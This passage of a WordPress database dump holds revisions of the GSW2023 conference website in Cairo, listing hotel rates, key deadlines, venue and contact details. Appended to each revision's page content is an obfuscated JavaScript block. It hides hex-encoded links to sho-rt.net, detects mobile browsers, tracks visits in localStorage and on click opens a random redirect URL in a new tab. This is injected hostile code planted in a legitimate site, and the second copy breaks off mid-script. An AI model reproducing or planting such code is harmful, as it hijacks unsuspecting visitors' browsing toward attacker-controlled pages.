title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 00:14:20','2023-06-24 00:14:20','',3066,'https://gsw2023.com/?p=4770',0,'revision','',0),
(4771,1,'2023-06-24 00:19:26','2023-06-24 00:19:26','<p>[vc_row][vc_column][vc_column_text]</p>\n<p><!-- wp:paragraph --><strong>For Booking</strong></p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph --><strong>Superior rooms at the below rate,</strong></p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph -->USD 190 per single room based on Bed and Breakfast inclusive of service charge and taxes.</p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph -->USD 210 per double room based on Bed and Breakfast inclusive of service charge and taxes.</p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph --><strong> Deluxe rooms at the below rate,</strong></p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph -->USD 210 per single room based on Bed and Breakfast inclusive of service charge and taxes.</p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph -->USD 230 per double room based on Bed and Breakfast inclusive of service charge and taxes.</p>\n<h5> </h5>\n<h5>2, Kasr El Nil St., P.O. Box 28 Bab El khalq Cairo| Egypt</h5>\n<h5>T +202 2575 0777 | F +202 2574 4333</h5>\n<h5>Email: Reservations.eltahrir@steigenberger.com</h5>\n<h5>ahmed.gaby@steigenberger.com<br />Mobile: +20 100 046 6312</h5>\n<h5> </h5>\n<!-- /wp:paragraph -->\n<p>&nbsp;</p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 